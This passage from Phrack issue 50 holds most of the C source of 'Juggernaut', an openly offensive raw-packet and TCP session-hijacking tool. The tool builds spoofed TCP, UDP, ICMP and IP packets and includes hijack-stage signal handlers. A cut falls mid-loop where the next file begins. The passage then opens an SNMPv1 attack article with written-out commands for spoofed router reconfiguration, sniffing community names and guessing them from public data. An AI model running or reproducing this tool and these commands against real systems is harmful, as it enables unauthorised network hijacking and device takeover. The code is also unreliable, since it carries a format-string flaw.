fprintf(stderr,"\nPSH? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.psh=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.psh=1;
flags[i++]='P';
}
fprintf(stderr,"\nRST? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.rst=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.rst=1;
flags[i++]='R';
}
fprintf(stderr,"\nSYN? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.syn=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.syn=1;
flags[i++]='S';
}
fprintf(stderr,"\nFIN? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.fin=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.fin=1;
flags[i++]='F';
}
if(!flags[0])strcpy(flags,"none set");
packetready|=0x10;
break;
case 6: /* Window Size */
fprintf(stderr,"\nWindow Size (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.window=htons(random()&0xffff);
packetready|=0x20;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x20)packetready^=0x20;
tpack.tcp.window=0;
break;
}
tpack.tcp.window=htons(val);
packetready|=0x20;
break;
case 7: /* Data payload */
bzero(data,sizeof(data));
bzero(tpack.payload,sizeof(tpack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(tpack.payload,sizeof(tpack.payload),stdin);
strncpy(data,tpack.payload,sizeof(data));
packetready|=0x40;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
if(buf[0]==0x0a||buf[0]=='q')break;
fgets(filename,sizeof(filename),stdin);
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0; /* Pesky Newline */
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<512){
j=read(fd,tpack.payload,sizeof(tpack.payload));
if(!j)break; /* No more bytes ta read */
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x40;
break;
}
if(packetready&0x40)packetready^=0x40;
bzero(data,sizeof(data));
bzero(tpack.payload,sizeof(tpack.payload));
break;
case 8: /* Return to previous menu */
loopsentry=0;
bzero(&tpack,sizeof(tpack));
break;
case 9: /* Return to Main */
loopsentry=0;
woe=1;
break;
case 10: /* RIP assembler */
if(packetready==0x07f){ /* AND mask of all the options */
tpack.tcp.doff=5; /* Data offset */
ripa(TCPTRANSPORT); /* Checksum will be computed in
ripa */
break;
}
continue;
default: /* Bad input */
continue;
}
}
}
/*
* UDP assembler
*/
void udpa(){
void ripa(int);
void mwipe();
void mpktaudp(int,unsigned short,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
int i=0,j,fd=0,loopsentry=1;
bzero(&upack,sizeof(upack));
srandom((unsigned)time(0));
while(loopsentry){
mwipe();
mpktaudp(packetready,ntohs(upack.udp.source),ntohs(upack.udp.dest),data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Source Port */
fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
upack.udp.source=0;
break;
}
if(buf[0]=='r'){
upack.udp.source=htons(random()&0xffff);
packetready|=0x01;
break;
}
if(!(int)(val=atoi(buf)))break;
upack.udp.source=htons(val);
packetready|=0x01;
break;
case 2: /* Destination Port */
fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
upack.udp.dest=0;
break;
}
if(buf[0]=='r'){
upack.udp.dest=htons(random()&0xffff);
packetready|=0x02;
break;
}
if(!(int)(val=atoi(buf)))break;
upack.udp.dest=htons(val);
packetready|=0x02;
break;
case 3: /* Data payload */
bzero(data,sizeof(data));
bzero(upack.payload,sizeof(upack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(upack.payload,sizeof(upack.payload),stdin);
strncpy(data,upack.payload,sizeof(data));
packetready|=0x04;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
if(buf[0]==0x0a||buf[0]=='q')break;
fgets(filename,sizeof(filename),stdin);
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0;
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<512){
j=read(fd,upack.payload,sizeof(upack.payload));
if(!j)break;
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x04;
break;
}
if(packetready&0x04)packetready^=0x04;
bzero(data,sizeof(data));
bzero(upack.payload,sizeof(upack.payload));
break;
case 4: /* Return to previous menu */
loopsentry=0;
bzero(&upack,sizeof(upack));
break;
case 5: /* Retuen to Main */
loopsentry=0;
woe=1;
break;
case 6: /* RIP assembler */
if(packetready==0x07){
upack.udp.len=htons(UDPHDR+BUFSIZE);
ripa(UDPTRANSPORT);
break;
}
continue;
default: /* bad input */
continue;
}
}
}
/*
* ICMP assembler
* This is no where as robust as it should be. In fact, it doesn't really
* create legal ICMP packets. Oh well. Next version. I am tired of
* packet assembly duldrums...
*/
void icmpa(){
void ripa(int);
void mwipe();
void mpktaicmp(int,unsigned short,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
int i=0,j,fd=0,loopsentry=1;
bzero(&ipack,sizeof(ipack));
while(loopsentry){
mwipe();
mpktaicmp(packetready,ipack.icmp.type,ipack.icmp.code,data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Type */
fprintf(stderr,"\nType (0,3,4,5,8,9,10,11,12,13,14,15,16,17,18) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
ipack.icmp.type=0;
break;
}
if(!(int)(val=atoi(buf)))break;
ipack.icmp.type=val;
packetready|=0x01;
break;
case 2: /* Code */
fprintf(stderr,"\nCode (0,1 {2,3}) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
ipack.icmp.code=0;
break;
}
if(!(int)(val=atoi(buf)))break;
ipack.icmp.code=val;
packetready|=0x02;
break;
case 3: /* Data payload */
bzero(data,sizeof(data));
bzero(ipack.payload,sizeof(ipack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(ipack.payload,sizeof(ipack.payload),stdin);
strncpy(data,ipack.payload,sizeof(data));
packetready|=0x04;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
if(buf[0]==0x0a||buf[0]=='q')break;
fgets(filename,sizeof(filename),stdin);
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0;
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<512){
j=read(fd,upack.payload,sizeof(upack.payload));
if(!j)break;
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x04;
break;
}
if(packetready&0x04)packetready^=0x04;
bzero(data,sizeof(data));
bzero(ipack.payload,sizeof(ipack.payload));
break;
case 4:
loopsentry=0;
bzero(&ipack,sizeof(ipack));
break;
case 5:
loopsentry=0;
woe=1;
break;
case 6:
if(packetready==0x07){
ripa(ICMPTRANSPORT);
break;
}
continue;
default:
continue;
}
}
}
/*
* IP assembler and xmitter. Transport layer checksum routines thanks to
* Myth (Red, actually).
*/
void ripa(transport)
int transport;
{
void mwipe();
void mpktaip(int,char *,char *,unsigned short,unsigned short,char *,char *,int,char *);
char *hostLookup(unsigned long);
unsigned long nameResolve(char *);
unsigned short in_cksum(unsigned short *,int);
char buf[2*MINIBUF];
unsigned long val;
char tosflags[MINIBUF]={0},fflags[MINIBUF]={0},packettype[MINIBUF]={0};
char sip[2*MINIBUF]={0},dip[2*MINIBUF]={0},*tempBuf;
int packetready=0; /* flag bits */
int i=0,j=0,k=0; /* Counters */
int loopsentry=1,number=0;
struct sockaddr_in sin;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
extern int ripsock;
bzero(&rippack,sizeof(rippack));
bzero((char *)&sin,sizeof(sin));
srandom((unsigned)time(0));
while(loopsentry){
i=0;
mwipe();
mpktaip(packetready,tosflags,fflags,ntohs(rippack.ip.frag_off),rippack.ip.ttl,sip,dip,number,packettype);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* TOS */
bzero(tosflags,sizeof(tosflags));
fprintf(stderr,"\nMinimize Delay? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x10;
tosflags[i++]='D';
}
fprintf(stderr,"\nMaximize Throughput? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x08;
tosflags[i++]='T';
}
fprintf(stderr,"\nMaximize Reliability? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x04;
tosflags[i++]='R';
}
fprintf(stderr,"\nMinimize Monetary Cost? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x02;
tosflags[i++]='C';
}
if(!tosflags[0])strcpy(tosflags,"none set");
packetready|=0x01;
break;
case 2: /* Frag Flags */
bzero(fflags,sizeof(fflags));
fprintf(stderr,"\nMore Fragments? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
rippack.ip.frag_off=0;
break;
}
if(buf[0]=='y'){
rippack.ip.frag_off|=htons(0x4000);
fflags[i++]='M';
}
fprintf(stderr,"\nDon't Fragment? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
rippack.ip.frag_off=0;
break;
}
if(buf[0]=='y'){
rippack.ip.frag_off|=htons(0x2000);
fflags[i++]='D';
}
if(!fflags[0])strcpy(fflags,"none set");
packetready|=0x02;
break;
case 3: /* Frag Offset */
fprintf(stderr,"\nFragment Offset [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
rippack.ip.frag_off|=htons(random()&0x1fff);
packetready|=0x04;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>8191){
if(packetready&0x04)packetready^=0x04;
rippack.ip.frag_off&=~0x3fff;
break;
}
rippack.ip.frag_off|=htons(val&0x1fff);
packetready|=0x04;
break;
case 4: /* TTL */
fprintf(stderr,"\nTTL (0 - 255) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
rippack.ip.ttl=random()&0xff;
packetready|=0x08;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>255){
if(packetready&0x08)packetready^=0x08;
rippack.ip.ttl=0;
break;
}
rippack.ip.ttl=val;
packetready|=0x08;
break;
case 5: /* Source Address */
bzero(sip,sizeof(sip));
fprintf(stderr,"\nSource Address [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
rippack.ip.saddr=0;
break;
}
if(buf[0]=='r'){
rippack.ip.saddr=htonl(random());
strncpy(sip,hostLookup(rippack.ip.saddr),sizeof(sip));
packetready|=0x10;
break;
}
strncpy(sip,buf,sizeof(sip));
for(i=0;i<2*MINIBUF;i++)if(!sip[i])break;
sip[--i]=0;
if(!(rippack.ip.saddr=nameResolve(buf))){
fprintf(stderr,"Cannot resolve IP address.\n");
fprintf(stderr,"[cr]");
getchar();
bzero(sip,sizeof(sip));
if(packetready&0x10)packetready^=0x10;
break;
}
packetready|=0x10;
break;
case 6: /* Destination Address */
bzero(dip,sizeof(dip));
fprintf(stderr,"\nDestination Address [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x20)packetready^=0x20;
rippack.ip.daddr=0;
break;
}
if(buf[0]=='r'){
strncpy(dip,hostLookup(rippack.ip.daddr),sizeof(dip));
rippack.ip.daddr=htonl(random());
packetready|=0x20;
break;
}
strncpy(dip,buf,sizeof(dip));
for(i=0;i<2*MINIBUF;i++)if(!dip[i])break;
dip[--i]=0;
if(!(rippack.ip.daddr=nameResolve(buf))){
fprintf(stderr,"Cannot resolve IP address.\n");
fprintf(stderr,"[cr]");
getchar();
bzero(dip,sizeof(dip));
if(packetready&0x20)packetready^=0x20;
break;
}
packetready|=0x20;
break;
case 7: /* Number of packets to send */
fprintf(stderr,"\nAmount (1 - 65536) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
number=(random()&0xffff);
packetready|=0x40;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65536){
if(packetready&0x40)packetready^=0x40;
number=0;
break;
}
number=val;
packetready|=0x40;
break;
case 8: /* Return */
loopsentry=0;
bzero(&rippack,sizeof(rippack));
break;
case 9:
loopsentry=0;
woe=1;
break;
case 10:
if(packetready==0x7f){
sin.sin_family=AF_INET;
sin.sin_port=0;
rippack.ip.version=4; /* IPv4 */
rippack.ip.ihl=5; /* This will change
if options are
present */
switch(transport){
case NOTRANSPORT: /* IP packet only */
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_IP;
break;
case TCPTRANSPORT: /* TCP */
sin.sin_port=tpack.tcp.source;
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_TCP;
tempBuf=(char *)malloc(PHDR+TCPHDR+BUFSIZE);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=rippack.ip.saddr;
ppheader->daddr=rippack.ip.daddr;
ppheader->prot=IPPROTO_TCP;
ppheader->null=0;
ppheader->tlen=htons(TCPHDR+BUFSIZE);
bcopy(&tpack,tempBuf+PHDR,PHDR+TCPHDR+BUFSIZE);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+BUFSIZE);
free(tempBuf);
bcopy((char *)&tpack,(char *)&rippack.payload,TCPHDR+BUFSIZE);
break;
case UDPTRANSPORT: /* UDP */
sin.sin_port=upack.udp.source;
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_UDP;
tempBuf=(char *)malloc(PHDR+UDPHDR+BUFSIZE);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=rippack.ip.saddr;
ppheader->daddr=rippack.ip.daddr;
ppheader->prot=IPPROTO_UDP;
ppheader->null=0;
ppheader->tlen=htons(UDPHDR+BUFSIZE);
bcopy(&upack,tempBuf+PHDR,PHDR+UDPHDR+BUFSIZE);
upack.udp.check=in_cksum((unsigned short *)tempBuf,PHDR+UDPHDR+BUFSIZE);
free(tempBuf);
bcopy((char *)&upack,(char *)&rippack.payload,UDPHDR+BUFSIZE);
break;
case ICMPTRANSPORT: /* ICMP */
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_ICMP;
break;
default: /* Control should never fall here */
if(verbosity)perror("RIP Assembler [unknown transport]");
exit(1);
}
for(k=number,i=0;i
<++> Juggernaut/NumberOneCrush/surplus.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* surplus.c - helper functions
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define HELPFILE "./ClothLikeGauze/.help"
#define FBUFSIZE 80
#define MINIBUF 10
extern int verbosity;
/*
* IP address into network byte order
*/
unsigned long nameResolve(hostname)
char *hostname;
{
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname))==-1){
if(!(hostEnt=gethostbyname(hostname)))return(0);
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
#ifdef FASTCHECK
/*
* Fast IP checksum routine.
*/
unsigned short in_cksum(buff,len)
unsigned char *buff;
int len;
{
unsigned long sum = 0;
if (len>3){
__asm__("clc\n"
"1:\t"
"lodsl\n\t"
"adcl %%eax, %%ebx\n\t"
"loop 1b\n\t"
"adcl $0, %%ebx\n\t"
"movl %%ebx, %%eax\n\t"
"shrl $16, %%eax\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum) , "=S" (buff)
: "0" (sum), "c" (len >> 2) ,"1" (buff)
: "ax", "cx", "si", "bx" );
}
if(len&2){
__asm__("lodsw\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "bx", "ax", "si");
}
if(len&1){
__asm__("lodsb\n\t"
"movb $0, %%ah\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "bx", "ax", "si");
}
sum =~sum;
return(sum&0xffff);
}
#else
/*
* IP Family checksum routine
*/
unsigned short in_cksum(ptr,nbytes)
unsigned short *ptr;
int nbytes;
{
register long sum=0; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
while(nbytes>1){
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1){ /* mop up an odd byte, if necessary */
oddbyte=0; /* make sure top half is zero */
*((u_char *)&oddbyte)=*(u_char *)ptr; /* one byte only */
sum+=oddbyte;
}
sum+=(sum>>16); /* add carry */
answer=~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
#endif
/*
* Network byte order into IP address
*/
char *hostLookup(in)
unsigned long in;
{
#define BUFSIZE 256
char hostname[BUFSIZE]={0};
struct in_addr addr;
#ifdef USENAME
struct hostent *hostEnt;
#endif
addr.s_addr=in;
#ifdef USENAME
hostEnt=gethostbyaddr((char *)&addr,sizeof(struct in_addr),AF_INET);
if(!hostEnt)
#endif
strcpy(hostname,inet_ntoa(addr)); /* KLUDGEY. */
#ifdef USENAME
else strcpy(hostname,hostEnt->h_name);
#endif
return(strdup(hostname));
}
/*
* Simple daemonizing procedure.
*/
int shadow(void){
int fd,pid;
extern int errno;
signal(SIGTTOU,SIG_IGN); /* Ignore these signals */
signal(SIGTTIN,SIG_IGN);
signal(SIGTSTP,SIG_IGN);
switch((pid=fork())){
case 0: /* Child */
break;
default:
exit(0); /* Parent */
case -1:
fprintf(stderr,"Forking Error\n");
exit(1);
}
setpgrp();
if((fd=open("/dev/tty",O_RDWR))>=0){
ioctl(fd,TIOCNOTTY,(char *)NULL);
close(fd);
}
errno=0;
chdir("/");
umask(0);
return(pid);
}
/*
* Keeps processes from zombiing on us...
*/
static void reaper(signo)
int signo;
{
pid_t pid;
int sys;
pid=wait(&sys);
signal(SIGCHLD,reaper);
return;
}
/*
* Dump usage and exit.
*/
void usage(nomenclature)
char *nomenclature;
{
fprintf(stderr,"\n\nUsage:\t%s [-h] [-s TOKEN [-e xx] ] [-v] [-t xx]\n\n
-h terse help
-H expanded help for those 'specially challanged' people...
-s dedicated sniffing (bloodhound) mode, in which TOKEN is found enticing
-e enticement factor (defaults to 16)
-v decrease verbosity (don't do this)
-V version information
-t xx network read timeout in seconds (defaults to 10)
Invoked without arguments, Juggernaut starts in `normal` mode.\n\n",nomenclature);
exit(0);
}
/*
* Simple file pager.
*/
void bookworm(){
FILE *fp;
char tempBuf[FBUFSIZE],buf[MINIBUF];
int i=0;
if(!(fp=fopen(HELPFILE,"r"))){
if(verbosity){
fprintf(stderr,"Cannot open help file.\n");
fprintf(stderr,"[cr]");
getchar();
return;
}
}
while(fgets(tempBuf,FBUFSIZE-1,fp)){
fprintf(stderr,tempBuf);
if(i==24){
fprintf(stderr,"\n[cr,q] >");
bzero(&buf,sizeof(buf));
fgets(buf,sizeof(buf-1),stdin);
if(buf[0]=='q')break;
i=0;
}
else i++;
}
}
/*
* Main signal handler to facilitate clean exits.
*/
void twitch(){
void cleanexit();
if(verbosity)fprintf(stderr,"\nCaught signal, exiting cleanly.\n");
signal(SIGINT,SIG_DFL);
signal(SIGQUIT,SIG_DFL);
cleanexit();
}
/*
* Used as a catchall to cleanly exit proccesses
*/
void spasm(){
extern int linksock;
if(linksock)close(linksock); /* Hunter should have this... */
exit(0);
}
/*
* Spy signal handler.
*/
void convulsion(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught signal.\n");
fprintf(stderr,"[cr]");
getchar();
signal(SIGINT,twitch);
sigsentry=0;
}
/*
* Pre-hijacking signal handler.
*/
void sputter(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught prehijack signal.\n");
signal(SIGINT,twitch);
sigsentry=0;
}
/*
* Post-hijacking signal handler.
*/
void seizure(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught posthijack signal.\n");
sigsentry=0;
signal(SIGINT,twitch);
}
/*
* Exit Cleanly.
*/
void cleanexit(){
void powerdown();
extern int ripsock;
extern int hpid;
extern int acrstpid;
close(ripsock);
powerdown();
if(kill(hpid,SIGUSR1))if(verbosity){ /* Send signal to the hunter */
perror("(cleanexit) Could not signal hunter");
fprintf(stderr,"[cr]");
getchar();
}
if(acrstpid) /* Send signal to the automated connection reset daemon.
XXX - This only signals one daemon! If more exist,
they will be left stranded! */
if(kill(acrstpid,SIGUSR1))if(verbosity){
perror("(cleanexit) Could not signal ACRSTD");
fprintf(stderr,"[cr]");
getchar();
}
fprintf(stderr,"Juggernaut is a Guild Corporation production, (c) 1996/7.\n\n");
exit(0);
}
<-->
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
7 of 16
Network Management Protocol Insecurity: SNMPv1
alhambra [guild]
alhambra@infonexus.com
As networks have become larger and more complex, a need has been felt by
certain portions of the network administration crowd to implement network
management protocols. From an administrative point of view, this makes
a lot of sense; centralize the administration of the network, and make it
convenient and easy for the administrator to monitor and administer changes
as needed. As usual, however, from the security point of view, these
protocols are a potential for catastrophe.
In this article, we'll explore the world of SNMPv1. In two later articles
(to be published in later issues of Phrack) we'll look into other network
management schemes (SNMPv2, DCE, etc). SNMPv1 has been around for a while.
In fact, a number of the problems outlined in this paper have been fixed
with the release of SNMPv2. As usual, however, large networks who placed
their original administration burdens on SNMPv1 have been slow to change.
As a result, large corporations, universities, and some small/cheap ISP's
still run their routers/hubs/bridges/hosts/etc with version 1 enabled, often
in horribly set up configurations.
The SNMP protocol
The SNMP protocol has 5 simple types of messages. They are get-request,
get-next-request, set-request, get response and trap. We will concentrate
on using the get-* messages to retrieve information from remote sites, routers
and the like, and the set-request to manipulate a variety of settings on our
target.
SNMP uses UDP as it transport mechanism. The basic layout of an SNMP packet
is:
+-----------------------------------------------------------------------------+
|IP |UDP|Version|Community|PDU |Request|err.|err. |name|value|name|value| ... |
|Hdr|Hdr| | |Type| ID |stat|index| | | | | |
+-----------------------------------------------------------------------------+
Community is SNMP's authentication mechanism. PDU type is the type of message
being sent (get-request, set request, etc.) Request ID is used to
differentiate between requests. Error status is (obviously) used to transport
error messages, and error index gives the offset of the variable which was in
error. Finally, name and value represent the name of the field requested and
either the value to set it to or the value of it on the remote server. These
are defined by a MIB written in ASN.1, and encoded using a code called BER.
ASN.1 is used to define data and the types and properties of this data.
BER is used to actually transmit the data in a platform independent manner
(similar perhaps to XDR.)
The values that can be fetched and set via SNMP are defined in what is called
the Message Information Base or MIB. The MIB is written in ASN.1, and defines
all the different variable classes, types, variables and whatnot associated
with SNMP. Standard things in the MIB are classes used to define variables
associated with data for statistics and values for the system as a whole, the
interfaces on the system, (possibly) an address translation table, IP, TCP,
UDP, ICMP, and so on, depending on just what kind of system the agent is
running on.
Where exactly do SNMPv1's security flaws lie? We can narrow them down to
4 general problem areas:
1) Use of UDP as a transport mechanism
2) Use of clear text community names and the presence
of default, overpriveleged communities
3) Information avaialable
4) Ability to remotely modify parameters.
They're all related to one another. We'll go through one by one, define
the problem, and explain how it is exploitable. Unfortunately, most of
SNMPv1 (from here on out, we'll just call it SNMP) problems stem from its
design, and have no easy solution barring the move to SNMPv2 or some other
network management protocol. Some common sense, however, can minimize the
problems in most situations.
UDP as a transport mechanism
I know I'm not alone in feeling that UDP is, at best, a poor idea when
used in any sort of application that requires any level of security. The
fact that UDP is connectionless leads to a myriad of problems with
regard to host based authentication, which unfortunately enough, SNMP uses
as one of its mechanisms. So we have 2 basic attacks due to the fact that
a UDP transport is used. First, we can easily spoof packets to a server, and
modify/add/reconfigure the state of the server. As we're using a spoofed
source address, there isn't any way to get the return message, but the
machine we are spoofing will simply drop the response message, and the server
is none the wiser. Using our 'snmpset' program which has been modified to
use a raw socket to allow us to forge the source address, we can modify any
value in the MIB defined as read-write ASSUMING WE HAVE A PRIVELEGED COMMUNITY
NAME.
snmpset -v 1 -e 10.0.10.12 router.pitiful.com cisco00\
system.sysName.0 s "owned"
Changes our the router name to 'owned', just in case we want to be really
obvious that this router has crappy security.
But how do we go about getting a legitimate community name? We have a few
different methods we can employ.
Use of cleartext community names, and default communities
One of the most laughable things about the SNMP protocol is its
"authentication" method. I use the term authentication in the loosest
sense only, as it makes me cringe when I think about it. SNMP only
can authenticate based on two different elements. The source address, as
we saw above, it trivial to forge, rendering address based authentication
useless. The second method is the use of "community" names. Community names
can be thought of as passwords to the SNMP agent. As easily as plaintext
password can be sniffed from telnet, rlogin, ftp and the like, we can sniff
them from SNMP packets. As a matter of fact, it's easier, as every SNMP
packet will have the community name. Grab your favorite sniffer (sniffer, not
password sniffer) and head over to your favorite segement running SNMP. My
sniffer of choice is 'snoop' so I'll use it as my example, though using any
other sniffer should be easy. SNMP uses port 161. The field we're after, the
community, is typically 6-8 characters long. Cranking up snoop on my segment
reveals the following. (IP's changed to protect the stupid, of course)
# snoop -x 49,15 port 161
Using device /dev/le (promiscuous mode)
10.20.48.94 -> 10.20.19.48 UDP D=161 S=1516 LEN=62
0: 0572 3232 3135 a028 0202 009c 0201 0002 .r4485.(.......
There we go. Using this community name we're able to grab all the info
we want, and modify all the parameter and whatnot we desire. Easy enough...
if you're able to sniff the segment. But what happens when you can't?
Available Information
When you can't sniff the segment, life gets a little more complicated. But
only a little. We have a few things on our side that may come in handy.
First off, almost always there is a default 'public' community. Very few
admin's take the time to deactivate this community, nor realize the risk it
poses. Using this community, we can usually read all the information we want.
Quite often, being able to read the information gives us enough clues to
try to brute force a legitimate community name.
snmpwalk -v 1 router.pitiful.com public system
will dump the contents of the system table to us, returning something like:
system.sysDescr.0 = "Cisco Internetwork Operating System Software ..IOS (tm) GS
Software (RSP-K-M), Version 11.0(4), RELEASE SOFTWARE (fc1)..Copyright (c) 1986
-1995 by cisco Systems, Inc...Compiled Mon 18-Dec-95 22:54 by alanyu"
system.sysObjectID.0 = OID: enterprises.Cisco.1.45
system.sysUpTime.0 = Timeticks: (203889196) 23 days, 14:21:31
system.sysContact.0 = "Jeff Wright"
system.sysName.0 = "hws"
system.sysLocation.0 = ""
system.sysServices.0 = 6
We see that we're dealing with a cisco router, and we see it's contact's name,
and the system name. Same as we might do with guessing passwords, we can use
this information to try to piece together a community name. Popular favorites
include stuff like 'admin' 'router' 'gateway' and the like, combined with
numbers or whatnot. Trying something like 'routerhws' for the above example
might work. It might not. While failed attempts are noted, very few people,
if any, ever check for them. (as it turns out, the above router had a
community name of 'cisco00'. Imaginative, eh?)
Even if only public works, there's lots of interesting things available via
SNMP. We can dump routing tables, connection tables, statistics on router use.
In certain situations, we can even get information on packet filters in place,
and access control rules. All are useful information to have in setting up
attacks in conventional manners. Sometimes public is even given r/w on
certain tables, and we can do most of what we need to do via that account.
When we do have a priveledged community though, the fun begins.
Remote Manipulation via SNMP
